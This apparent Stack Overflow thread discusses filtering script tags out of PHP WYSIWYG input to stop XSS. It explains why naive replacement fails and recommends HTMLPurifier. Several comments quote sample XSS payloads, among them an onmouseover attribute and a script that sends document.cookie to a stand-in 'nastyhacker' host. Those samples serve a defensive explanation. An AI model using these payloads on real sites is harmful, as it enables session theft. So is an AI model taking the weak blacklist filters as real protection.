# Removing <script> tag - PHP

Tags: php, javascript

How to change all the occurrence of the `<script> <Script> <scRipT> <sCrIpT> and so ..` to `&lt;script&gt; &lt;Script&gt;` with PHP
I also want to remove

The input will be taken from a WYSIWYG Editor, so i can not use the strip_tags function.

`Edit 2`
Is there any other way a user can execute a javascript with some kind of strange characters to
I found this on internet

```
<scr<!--*-->ipt>
alert('hi')
</script>
```

But it did not worked though, is there any such possibilities ?

Answer (score 3, accepted):

Probably the simplest method would be `str_ireplace()` for case-insensitive replacement, however this won't preserve the case of the "sCriPt" word.  But if you're out to de-fang XSS attacks that may be just fine:

```
str_ireplace("<script>", "&lt;script&gt;", $input);
```

A more complex solution could be devised with `preg_replace()` to preserve case, but would be slower.  This might work, but if it were me I'd use `str_ireplace()`...

```
preg_replace("/<(script)>/i", "&lt;$1&gt;", $input);
```

**Note**: If it is XSS prevention you're after, neither of these takes into account things like `<script type=text/javascript>`.  To truly handle these cases, you need to load the HTML string into `DOMDocument` and delete the offending script nodes.

Comment: [Do not use a regex to parse HTML.](http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags/1732454#1732454)

Comment: @josh3736 I agree, and as in my answer I wouldn't use `preg_replace`, but in this instance it isn't even being used as a regex. Instead it's just a shortcut to preserve case in a simple string replacement. Anyway, disclaimer added above.

Comment: `you need to load the HTML string into DOMDocument and delete the offending script nodes` how to do that !

Answer (score 6):

Simply removing `<script>` tags from untrusted input is not enough to guard against XSS attacks.  For example, `<a href="#" onmouseover="alert('pwned!');">` – I just put script in your page—without using a `<script>` tag—and stole your cookies.  Oops.

This is a case where you really need to use [a well-tested library that actually parses the HTML and removes the stuff you don't want](http://htmlpurifier.org/).

Comment: i can convert < to `&lt;` but the problem is i'm using WYSIWYG editor, and they use <> too for html tags :(

Comment: BTW i've heard people stealing cookie using JAVASCRIPT, how is it possible :O, coz [i think] JS can not mail you my cookie, you are only able to steal your own cookie, if i 'm wrong please show me the error

Comment: @Sourav: Right, because `<script>` is a HTML tag just like `<b>` or any other.  That is why you need a library like [HTMLPurifier](http://htmlpurifier.org/) to parse your input and remove unsafe tags and attributes (like `<script>` blocks and event handler attributes like `onmouseover`, `onclick`, and `onload`).

Comment: @Sourav, re stealing cookies: If I could insert `<script>document.write('<img src="//www.example.com/nastyhacker?cookie=' + encodeURIComponent(document.cookie) + '">');</script>` into a page, I've successfully stolen the cookies of anyone who loads that page.  (This is mitigated by the server setting a login cookie as [HttpOnly](http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html), but that obviously depends on the site's configuration.)

Answer (score 0):

Is there any reason you can't use [`htmlspecialchars()`](https://www.php.net/manual/en/function.htmlspecialchars.php)?

Comment: I just want to convert <,>,'," to save DB space

Comment: @Sourav How will that conserve space?

Comment: When i use htmlspecialchars() it will convert & to `&amp;` so it stores 5 characters instead of a single !

Comment: But if you convert `<` to `&lt;` it will be storing four characters instead of one..Either way, I highly recommend the answers above regarding XSS.